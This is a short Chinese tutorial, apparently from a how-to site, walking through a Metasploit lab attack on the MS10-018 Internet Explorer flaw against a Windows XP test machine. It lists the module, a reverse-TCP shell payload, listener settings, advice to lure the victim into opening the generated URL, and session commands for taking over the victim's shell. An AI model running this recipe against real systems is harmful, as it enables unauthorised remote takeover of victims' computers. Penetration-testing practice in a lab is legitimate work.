kail利用msf对MS10-018漏洞进行渗透测试，获取被攻击者管理权工具：metasploit靶机：windows XP以下为实验过程：工具/原料morekailmetasploitwindwosXP 一台方法/步骤1/11分步阅读

打开metasploit工具，等待工具启动。键入search ms10-018

2/11

use exploit/windows/browser/ms10_018_ie_behaviors

应用模块

3/11

安装一个反向链接工具

set payload windows/shell/reverse_tcp

4/11

设置服务器地址 为攻击者自身ip，运行show options 显示选项

set srvhost 攻击者ip 设置服务提供者ip

set lhost 攻击者ip

show options查看选项

5/11

显示可以被利用的操作系统

6/11

执行恶意代码，会生成一个一个URL，想方设法让被攻击者打开。比方说内嵌在网页中，在这里我们就直接在IE内打开这个URL

7/11

当攻击者打开该URL时，IE卡死，崩溃

8/11

此时，界面会显示中招的主机

9/11

执行show sissons 查看会话

10/11

执行sessions -i 会话号 成功获取到被攻击者cmd

11/11

此时被攻击者，IE卡死，崩溃，攻击者拿到了被攻击者的权限，为所欲为。

此时就像在xp上一样打开cmd执行命令

注意事项

kail首次打开metasploit，建议桌面打开，不要在终端内打开，因为首次打开该工具，会初始化数据

仅供学习漏洞渗透测试，不得用于其他非法用途，否则造成的任何后果自负！！！

操作系统渗透攻防